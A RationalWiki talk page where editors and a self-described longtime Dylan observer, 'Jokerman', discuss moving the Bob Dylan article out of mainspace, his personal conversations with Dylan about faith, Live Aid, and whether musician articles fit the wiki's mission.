If so, this is unfortunate. For I've always considered my bedrock personal rationality--steadfast agnosticism, rejection of all belief-system silliness from crystals and past-lives to Mormonism and Scientology--to be the very basis of my appreciation of Dylan's contributions, ergo my enduring interest in him. The kind poster "Colonel Sanders" called me a "fan", but much more accurately, I'm just a longtime observer who is more frequently critical of the artist in recent decades than laudatory. In fact, I've always found most of his stage work and too much of his recording downright embarrassing, hence the employment of the word "laughable" in my conclusion. Not much of a "fan", you would agree?
Any reader will notice, however, that throughout--or at least prior to your collective redaction--I particularly focussed on behavior, quotes and other hints as to the famously-inscrutable Dylan's intellectual orientation regarding the reason-vs.-faith struggle that none of us herein are fence-sitters regarding.
Sir "Sanders" also graciously invited me to register with this Wiki, but that seems to me to be easier said than done! In any event, I'll try registering again, although I'm betting that is now pointless, given the tone I seem to have inadvertently generated.
Sorry if I annoyed you folks, although I hope you'll understand that it was wholly unintentional. I just figured other folks who deal in reason rather than emotion, who might very well have only been familiar with the standard--and profoundly simplistic-- spokesman-of-a-generation summary of this favorite-of-the-intellectuals recording artist, would probably greatly appreciate an overview from someone who had for a good while a pretty comprehensive perspective.
I am to presume I'm implicitly disinvited to further contributions on this, and for that matter, any of the other entries I might have some worthwhile information?
Thanks for reading, and may we all have a terrific 2011.
JOKERMAN [for lack of a better nom de edit]— Unsigned, by: 99.99.22.25 / talk / contribs
- Jokerman, you have it all wrong. It is indeed an excellent article and I will consider moving Bob Dylan back. But the reason I moved musicians to this namespace is indeed most of the musician articles are indeed written by "fans" and really are off-mission. If you really insist on this being in namespace in analysis in these contributions of Mr. Dylan (as opposed to his musical contributions, as you stated you have done in your post), I will invite a consensus of interested users. And you may continue edits to this article as you please, but if you wish to move it into namespace, it must conform to RationalWiki's namespace rules, which most musician articles do not. And you are still invited to create an account on this website by clicking on the Log in/Create an Account button on the top right hand corner on any page and upon reaching press the "Create an Account" button in the log in box and then follow the instructions, mainly so you can be attributed for your contributions. Thank you for your civility and concern.--Colonel Sanders (talk) 18:30, 30 December 2010 (UTC)
- Jokerman, it seems to me like you have a thick enough skin to deal with this mob appropriately. I only hang around the edges of it, so take this with a grain of your own high-quality salt. I suppose I need to go read through the article you have made such a massive scholarly contribution to, sifting it for mission-related messages. Be well, and have a fantastic 2011! Sprocket J Cogswell (talk) 18:33, 30 December 2010 (UTC)
- Hi Jokerman. The thing is that all the musician articles are a bit doubtful in terms of our objectives. See here for a description of what should be in our articles.
- You saw the existing article and decided to improve it. You put a lot of work into it and it was very good - it was really our fault to leave it in mainspace as an implicit invitation to be improved upon. You will see that it has not been deleted - simply moved out of the main article space.
- You are absolutely most welcome to edit any articles here which fit with the mission statements on the main page. Please stick around, and if you're having any problems creating an account feel free to ask here at in the bar. Cheers.--BobSpring is sprung! 20:04, 30 December 2010 (UTC)
Response to Colonel Sanders's clarification[edit]
Dear "Colonel",
Much appreciate the good will!
First off, you need not worry about my possibly "moving" the Dylan entry to this or that other sector of RationalWiki; I wouldn't have a clue how to accomplish that, as I'm less skilled at software navigation than I am at particle physics--and I find superstring theory as difficult as divining Dylan's mindset in the wake of his Christian interlude! Indeed, I was surprised that so much of my textual enhancement of the original posters' Dylan efforts ended up looking like I intended it to.
That said, I would never have meddled herein if the overriding theme of RW was anything BUT rationality. As evidence of my own good will, I've never even attempted to edit the justifiably lengthy WikiPedia entry on Dylan, even when spotting factual errors. (I figure others will eventually do so, and in each instance I've been borne out.)
But my principal point is that, if not for my rationality, I doubt I would have ever recognized Dylan as much more than a guy with a funny nose, funnier hair and the funniest voice. (That's actually a code-phrase I developed during my lengthy professional broadcast career to be able to cite him when necessary without ever naming him, given that his influence continually pops up in the oddest corners of the culture and thus mandates mention, but I understood well any frequency greater than about one named citation per month would have contaminated my various general-interest programs over the years as those of a hopeless "Dylan freak".)
Yet I am rational to a fault--or so I'm often told--and long ago reached the seemingly preposterous conclusion Dylan has a claim on being the most original creative force ever; indeed, I e-published a monograph with that very thesis a few years ago, and it has never been lost on me that the more reason-based the crowd I'm hanging with, the more they seem to recognize that Dylan is far beyond being just another gifted aging rock star past his prime.
That's really all that was behind this, and I'm flattered you found my re-working and expansion of earlier posters' work to be well-written.
By the way, in the late '80s, in anticipation of Dylan sometime finally making good on an 1980 offer to let me interview him--while I've had quite a few conversations with the artist beginning in 1975, each has been informal--I crafted a question designed to reveal his post-Christian-period faith orientation, i.e., whether he in fact has rejected his onetime supposed born-again status. It's an imperfect question, mind you, because it is one he can easily lie in response to...but ONLY if he no longer considers himself "saved". (That he once did actually so believe sincerely seems to me to be clear; indeed, in that very 1980 conversation, a lengthy sit-down chat which was more relaxed and apparently sincere than maybe any of my other conversations with him, he inquired as to whether I myself was also saved. {Talk about insincerity: throwing caution to the wind, I actually fibbed in response, claiming I was Jewish to avoid any possible hassle, even though it would be a decade before I formally converted...and then only through the atheistic/agnostic Society for Humanistic Judaism.) Anyway, that night in October 1980 there was no hint--unlike during most Dylan chats--the artist was in one of his various BSing modes.
But again, to avoid in the future his possibly misleading me on this key question as much as I misled him on his saved-or-Jewish-or-heathen inquiry (rather limited menu of choices, eh?), I eventually worked up a question that can be hugely revealing. That is, if Dylan today REMAINS in the mental clutches of fundamental Christianity, he CAN'T reply in anything other than the affirmative. So what is this golden question, one which I've run by numerous Christian clergymen over the years to confirm its religious airtightness? Simple: "Bob, do you still recognize Christ as your personal savior?"
Alas, I no longer expect to get the chance to someday pose it, but y'know, Dylan's people claim I was nearly granted an interview during a recent leg of his now-fabled Neverending Tour, so who knows, er, when my ship comes in? Then again, even if it does come to pass, I may end up like Dylan's own lyrical (and biblical) Goliath, and I "will be conquered". But hey, one can sure do a lot worse in life than to be outsmarted by Dylan.
In the meantime, thanks for your gracious clarifications, and now let's all sit back and marvel at how 2011 unfolds! (Think there's much chance Zeus will make a Second Coming?)
Appreciatively, JOKERMAN, somewhere in Dylanology — Unsigned, by: Jokerman / talk / contribs 21:48, 30 December 2010 (UTC)
- You're welcome. We appreciate your marvelous work to the entry. I hope to see further contributions from you, as you are very wise and rational indeed. You could be an excellent contributor. I am not positive about Zeus making a second coming, but anything is possible. Happy 2011,--Colonel Sanders (talk) 22:19, 30 December 2010 (UTC)
Live Aid[edit]
Didn't Bob Geldof blast Dylan for mentioning some of the Live Aid money be given to US farmers? GooRoo (talk) 07:36, 31 December 2010 (UTC)
I've never heard that previously, "Roo". But if Geldolf DIDN'T, he probably should have. For however well-intentioned--and influential!--Dylan's remarks were (Rolling Stone rhapsodized, "Proof positive that when Dylan mutters, the world still listens"), it was still inappropriate for Dylan to have gone so wildly off-message, especially given the conspicuousness afforded his encore-preceding slot for a 15-odd hour affair. JOKERMAN
Bronze?[edit]
I think so.--Colonel Sanders (talk) 05:38, 18 July 2011 (UTC)
Mission.[edit]
Could someone explain to me again what this has to do with us?--BobSpring is sprung! 21:07, 25 November 2011 (UTC)
- <_< >_> yeah, I got nothing. Тytalk 02:07, 5 December 2011 (UTC)
- me neither. We could at least cut out all the post-60's stuff. The only potentially missionish thing about him are his protest songs, and even that could be merged into an article about the sixties protest movement. Sophiebecause liberals 20:09, 15 February 2012 (UTC)
- It's very mission, if you choose to make it that way. He is a symbol of the liberal movement in the US, often cited to by both the right and the left about his roll in society. Besides that, if well written, some articles are here cause we just like the subject. and there's nothing wrong with that. *if well written*. This one has a long way to go.
- and this, right here "Dylan is often credited, along with The Beatles, as being one of the major forces propelling rock-and-roll, and popular music generally, into territory where it could explore complex ideas about life, poetry, politics, religion and philosophy." is exactly why it's on mission. He's a thinker, a philosopher - he'd be a Rational Wikian, if he gave a shit about the internet.
GodotGrow a vagina 20:25, 15 February 2012 (UTC)
- On this bases we can have articles on the Spice Girls, Enrico Caruso and George Formby as you can always find something vaguely on-mission.
- It will probably get a bit repetitive with musicians as well, as we will probably end up saying generally similar things about all the protest song writes of the 60's for example.--BobSpring is sprung! 20:42, 15 February 2012 (UTC)
- The fighting over "what is mission" is really quite tiring, I think. Let the articles speak for themselves. Why shouldn't we have an article on Spice Girls, we have articles on every single right wing nutjob from here to Nantucket. To me, the issue should always be how the author presents the material, and if when you read it, it adds something to your knowledge about anything "Rational Wiki" which has long outgrown the idea that we just refute bad science. The Right holding these guys up as horrors, because they have opinions the Right disagrees with (while at the same time fawning over Toby Keith) is something that should be addressed.
GodotGrow a vagina 20:47, 15 February 2012 (UTC)
- And i still say, by the way, if someone wants to write a rational wiki article about manilla folders, and really shows why they should matter to us, that's a RW article. Hard lines are not nearly as important as really looking at what makes our society see some people (Or things) one way, and others in a different light - and that's very RWish.
GodotGrow a vagina 20:48, 15 February 2012 (UTC) | https://rationalwiki.org/wiki/Talk:Bob_Dylan | CC-MAIN-2019-22 | refinedweb | 2,959 | 60.35 |
Tried it and seem to have a problem with this little Groovy script ..
-----------------------------------
println 'I can see this ..'
def clos = {println "${it} ... "}
clos('But not this')
println 'Can this though ..'
-----------------------------------
In the output i see ...
-----------------------------------
I can see this ..
Can this though ..
-----------------------------------
So the output from the closure is lost ..
This doesn't happen when I run the code in
the GroovyConsole - I get ..
-----------------------------------
groovy> println 'I can see this ..'
groovy> def clos = {println "${it} ... "}
groovy> clos('But not this')
groovy> println 'Can this though ..'
I can see this ..
But not this ...
Can this though ..
----------------------------------
Anyone any idea ? I'm new to Groovy ..
Posted by Rob on December 06, 2007 at 11:40 AM PST #
Yes. Please read this blog entry:
Posted by Geertjan on December 06, 2007 at 12:35 PM PST #
Thank you very much for the quick reply .. And I really like the plugin ..
Posted by Rob on December 06, 2007 at 03:05 PM PST #
Thank you for your effort. I'm looking for it for long time. I'm dissapoint that SUN didn't focus on groovy. Instead they have spent so much effort on Ruby. And Netbean's Ruby support is awesome. But I don't think it will be that interesting for most of Java developers. It's too far from java. But Groovy is a nice match for Java community. Really hope SUN can realize that and spend their money on the right technology.
I have tried your plugin, it's easy to setup and works fine. It's great.
But I think the function is limited, I'm trying to use groovy to write unit test for java class in a Maven2 project. But seems the java class is not in the groovy classpath, they are not visible in groovy. Do I miss something? Another thing, I hope I can debug groovy. At least I can put break point in java code. Then start the groovy unit test, java code can break. That will be helful. I understand that is not easy task.
Thanks.
Posted by jianwu on December 07, 2007 at 07:08 AM PST # | http://blogs.sun.com/geertjan/entry/groovy_plugin_updates_to_netbeans | crawl-002 | refinedweb | 355 | 88.02 |
Need Help with Java-SWING progrmming - Swing AWT
Need Help with Java-SWING progrmming Hi sir,
I am a beginner... with a program in swing. Could you help me with an example?
Regards
Sreejith ...://
Thanks
PROJECT ON JAVA NET BEANS AND MYSQL !! PLEASE HELP URGENT
PROJECT ON JAVA NET BEANS AND MYSQL !! PLEASE HELP URGENT i need a project based on connectivity..it can be based on any of the following topics...://
urgent help for inserting database in a project
urgent help for inserting database in a project I need some urgent help
i have made java application for conducting a quiz which displays 25 mcq's and then the result at the end.I need to add simple database connectivity
plz help -java project very urgent
plz help -java project very urgent ? Ford furniture is a local... person will get 60% of the value above half price. For example, if a luxury bed.... For example, if a dining set is priced at 3000, and was sold at 30% discount, the sales
urgent need in two days - JSP-Servlet
the output.This Example is a good mix of various Java Technologies such as Servlet... the Mysql and Jdbc database connectivity code through example. See the Given JSP Example Code-------------------------------Servletform.html<
pls help me it urgent
pls help me it urgent hey, pls help me i want to know that can we call java/.bat file from plsql/proceudre /trigger
Urgent java programming question.Pls help
Urgent java programming question.Pls help Q1. Generate 10 thousand random integers with values in the range between 1 to 100.
Q2. Store each randomly generated number into a node and then attach the node to a linked list
Please help me... its very urgent
Please help me... its very urgent Please send me a java code to check whether INNODB is installed in mysql...
If it is there, then we need to calculate the number of disks used by mysql
Need urgent help with C++ errors!
Need urgent help with C++ errors! hi,
i'm new to C++ programming... don't know what to do.
Please help!!
#include<iostream.h>
void main... help
urgent...pleAse help me.....please!
urgent...pleAse help me.....please! please help me urgent! how can i do dictionary with the use of array code in java, where i will type the word then the corresponding meaning for that word will appear...thanks
seriously need help....
seriously need help.... Write a program that will prompt the user... program.
Use each of the following Java statements at least once in your program.... Example On-Peak Cost ==== $25.36
Parameters
- rate band
- cost
swing program plz urgent sir - Java Beginners
swing program plz urgent sir
hi sir,i waan a jtable swings program table having column names "itemid","price".Initially table having single empty row.whenever we click the "enter" button automatically new row will be insert
Help Required - Swing AWT
JFrame("password example in java");
frame.setDefaultCloseOperation...();
}
});
}
}
-------------------------------
Read for more information.
Thanks.
Amardeep
Need Help in Java programming
Need Help in Java programming Hello. Can someone please help me with writing the following program
Java program that gives assignment details such as:assignment number,assignment name,due date,submission date,percentage marks
java swings - Swing AWT
. swings I am doing a project for my company. I need a to show... write the code for bar charts using java swings. Hi friend,
I am
Need Help - Java Beginners
Need Help Hello Sir,
Am a beginner of Java. Also i did course... projects in Java as well as J2EE...
Can u help me and guide to do a project.../reference/tutorials/
http
need help - Java Beginners
need help Need help in programming in Java Simple java program that will show the output within quotes using system.out.println();DISPLAYING OUPUT " * " ," *** " ........I used System.out.print
Programming Help URGENT - JSP-Servlet
Programming Help URGENT Respected Sir/Madam,
I am R.Ragavendran. I am in urgent need of the coding. My requirement is as follows:
Beside..., connection for JDBC codings are present..
NOTE: When User clicks Insert,for example
Need help - Java Beginners
Need help To Write a Java program that asks the users to enter a m * n matrix of integers, m and n being the
number of rows and columns...; Hi Friend,
Please try the following code. We hope that this code will help
Need help in java programming
Need help in java programming Hello.
Can someone please help me with writig the following programm.
Assignment 20%
Presentation 10%
Mini Test 10%
Exam 60%
Java program that accepts the following details: student
need help with a program - Java Beginners
Java algorithm - need help with a program Java algorithm - need help with a program
need help. - Java Beginners
Sales System.. Need Help!! - Java Beginners
Sales System.. Need Help!! were going to make a sales system in our... any idea of this. Can you please give us an example how we will make it... Pls help us.. Thank you very much for your reply in my past questions you are a big
java swing (jtable)
java swing (jtable) hii..how to get values of a particular record in jtable from ms access database using java swing in netbeans..?? please help..its urgent..
Here is an example that retrieves the particular record
need help - Swing AWT
need help Create a program to correct and grade a set of multiple choice test result. this is a console program that uses JOptionPane dialog boxes as well.
Must read a set of 10 correct answers, using a JOptionPane dislog box
need help with a program - Java Beginners
need help with a program Part I An algorithm describes how... by the user. The output of the program should be the length and width (entered.... First you would need to make up the "test data". For this algorithm, the test data
urgent - Java Interview Questions
://
Thanks... display the url one by one.using core java technology
(e.g)when am requesting
Java Programming Need Help ASAP
Java Programming Need Help ASAP You are required to develop..., maths mark, communications mark. You will then need accessor and mutator methods... class that creates an array of Students and handles it. You will need
URGENT: User Defined Classes - Java Beginners
URGENT: User Defined Classes Can someone help me?
Design...://
Here, you will get different data.... For example, if the current day is Monday and we add four days, the day
Swing - Java Beginners
: Hi friends. I need a swing programming book for free download... links:
Need *Help fixing this - Java Beginners
Need *Help fixing this I need to make this program prompt user... and maybe add retrieve function //need help with this one badly. Thanks guys for all the help.
import java.text.*;
import javax.swing.*;
import java.awt.event.
PLZ Need some help JAVA...HELP !!
PLZ Need some help JAVA...HELP !! Create a class names Purchase Each purchase contains an invoice number, amount of sale and amount of sales tax. Include set methods for the invoice number and sale amount. Within the set
Need an Example of calendar event in java
Need an Example of calendar event in java can somebody give me an example of calendar event of java
Java swing - Java Beginners
Java swing Hi,
I want to copy the file from one directory... will be displayed in the page and progress bar also.
Example,
I have 10 files... ,its very very urgent
Java swing - Java Beginners
Java swing Hi,
I want to copy the file from one directory... will be displayed in the page and progress bar also.
Example,
I have 10 files... will be displayed.
Please send the sample code ,its very very urgent.
Thanks
urgent please, help!
urgent please, help! how to make jTable unclickable and have unmovable columns, thanks in advance
import javax.swing.*;
import java.awt.... frame = new JFrame("Creating JTable Component Example!");
JPanel panel = new
Java Swing Open Browser
that will open the specified url on the browser using java swing. This example will really helpful if you need to show the help window for your application. Here, we have...Java Swing Open Browser
Java provides different methods to develop useful
JAVA SWING
JAVA SWING Hi....
Iam doing project in java...and my front end in swing ..our project is like billing software...
then what are the topics i want cover? then how to design?
pls help me
java - Swing AWT
java hi can u say how to create a database for images in oracle and store and retrive images using histogram of that image plz help me its too urgent
java swing.
java swing. Hi
How SetBounds is used in java programs.The values in the setBounds refer to what?
ie for example setBounds(30,30,30,30) and in that the four 30's refer to what
help in java
help in java Define a class named Money whose objects represent... and a single argument. For
example, this version of add method (for addition) has...; for example, there should be two methods named add.
Write a test program for your
java swing - Swing AWT
:
Thanks...java swing how to add image in JPanel in Swing? Hi Friend,
Try the following code:
import java.awt.*;
import java.awt.image.
Need source code - Swing AWT
Need source code Hai, In java swing, How can upload and retrieve the images from the mysql database? Hi Friend,
To upload and insert image in database, try the following code:
import java.sql.*;
import
guys,, need help,, in java programing,, arrays
guys,, need help,, in java programing,, arrays create a program where you will input 10 numbers and arrange it in ascending way using arrays
Java swing
are displayed in the table..I need the source code in java swing...Java swing If i am login to open my account the textfield,textarea and button are displayed. if i am entering the time of the textfield
Urgent requirement
Urgent requirement I want to implement Autocompletion code for Jcombobox in swing can you please help me out from
urgent need
urgent need Input a line. Count the number of words that start with a capital letter
Java Swing Tutorials
with the help of Java 2D API.
Data Transfer
Swing... how to create the
JTabbedPane container in Java Swing. The example...
components with the help of grid in Java Swing. The grid layout provides
need help on writing a program. - Java Beginners
Writing first Java Program Hi, I need help to write my first Java... roseIndia to get your query solved. check given link to see the solution of your Java problem.
urgent - JSP-Servlet
Simple Jsp and Java Example Simple Jsp and Java Example
help i need help with this code.
write a java code for a method named addSevenToKthElement that takes an integer array, and an integer k as its arguments and returns the kth element plus 7.
any help would be greatly
I need your help - Java Beginners
I need your help What is the purpose of garbage collection in Java, and when is it used? Hi check out this url :
Need help in constructing bubble sort
Need help in constructing bubble sort using a bubble sort, for each entry in the array, display the original index of the first dimension...://
scrolling a drawing..... - Swing AWT
,
I am sending you a link. This link will help you. Please visit for more information.... is dynamic and hence there is no fixed size, that's why i need to make
Java swing code - Java Beginners
://
I hope this would be helpful to you...Java swing code How to set a font for a particular cell in JTable? Hi Friend,
Please visit the following link for any kind of help
Java Question Anyone need some HELP !!
Java Question Anyone need some HELP !! Create a file that contains... of the two files.
Note: For the above code, you need POI api.
import... and poi-scratchpad-3.2-FINAL-20081019.jar files into the following path:
\Java
SWING
SWING A JAVA CODE OF MOVING TRAIN IN SWING
jtable in java swing
jtable in java swing hai friends...
i am creating 1 GUI having 1.... It gets filled through program. I need to develop such application. After... in the 3rd column.like way..
Some 1 please help me to develop such application
Design a Toll bar - Swing AWT
a link. This link will help you.
Please visit for more information.
Thanks...(Standard/Formating Tool bar).
it's very urgent.
Thanks in Advance.
Thanks
need help pleaseee....i weak in java
need help pleaseee....i weak in java QUESTION 1
You are required to write an application called Customer Billing System. This system... meter reading, current meter reading and charges. Write a structured Java program
need help with java program as soon as possible
need help with java program as soon as possible So my assignment is to write a program that used while loops to perform 6 different things.
1. prompt the users to input two integers: firstNum and secondNum (firstNum must be less
( Inheritance,need help in Polymorphism, Overriding) - Java Beginners
( Inheritance,need help in Polymorphism, Overriding) can any one please help me create this application,thank you
Advanced Concepts with Classes( Inheritance, Polymorphism, Overriding)
Employees in a company are divided
Java Swing : JLabel Example
In this tutorial, you will learn how to create a label in java swing
need help creating a lift program - Java Beginners
need help creating a lift program Classes, Methods, Constructors
please i need help to create an elevator program
Simulating an Elevator
write... for any help rendered
Need help writing a console program
Need help writing a console program I need help cant seems to figure it out!
Write a program that consists of three classes. The first class...):
This is a test, this is only a test!
This test is a test of your Java programming
Java swing
Java swing Design an appliaction for with details such as name,age,DOB,address,qualification and finaly when we click the view details button all types details should be displayed in another View in TextView's..I need the sample
I need your help - Java Beginners
I need your help For this one I need to create delivery class for a delivery service .however, this class should contain (delivery number which... the file name is ApplicationDelivery.java
Your program must follow proper Java
need of java coding - JavaMail
need of java coding Design a java interface for ADT stack. Develop it and implement the interface using link list. Provide necessary exception handling for that implementations.
pls mail me this lab program..its urgent
I need help in doing this. - Java Beginners
I need help in doing this. Student DataBase
i will need creating a program that will be
used to manipulate a student database. This portion..., and the student's GPA.using arrays and objects, need to structure the information
Urgent programming assignment
Urgent programming assignment Hi,
I am an Indian student in USA.I have been able to write all the java codes successfully , however this one is giving me tremors.Any help would be highly appreciated.I am attaching
Swing - Applet
information on swing visit to : Hello,
I am creating a swing gui applet, which is trying to output all the numbers between a given number and add them up. For example
java swing and CSS
java swing and CSS can css be used in java swing desktop application in different forms for better styles?plzz help
swing
swing Write a java swing program to delete a selected record from a table
Java - Swing AWT
Java Hi friend,read for more information,
Query on Java Swing - Table Cell Issue - Swing AWT
Query on Java Swing - Table Cell Issue Hi,
I have a query on Java Swing.
we are using swing in our application, In one of the frame we... unable to show the cursor in the focused cell which is editable.
what do I need do
Create a JRadioButton Component in Java
button in java swing. Radio Button is like check box. Differences between check... with the help of this program. This example provides two radio
buttons same...
Create a JRadioButton Component in Java
i need latest oracle certified java dumps.. Pleas help me?
i need latest oracle certified java dumps.. Pleas help me? i need latest oracle certified java dumps.. Pleas help me
help - Java Beginners
help hi,i am new to java & i do not have progamming background, i just run the hello world example given, but i am not seeing the output, it just shows the c:\javatutorial> in the command prompt, is there any setting i need
java help
java help How to Open CSV Files in a Microsoft Excel Application Using Java Code with example pgm
reply me its urgent - Java Beginners
reply me its urgent Hi friends
I am facing problem in my application in this type please help me
i am using database mysql5.0 version... urgent. hi friend,
i think password is wrong or username may be wrong
Advertisements
If you enjoyed this post then why not add us on Google+? Add us to your Circles | http://www.roseindia.net/tutorialhelp/comment/97706 | CC-MAIN-2015-48 | refinedweb | 2,868 | 66.44 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.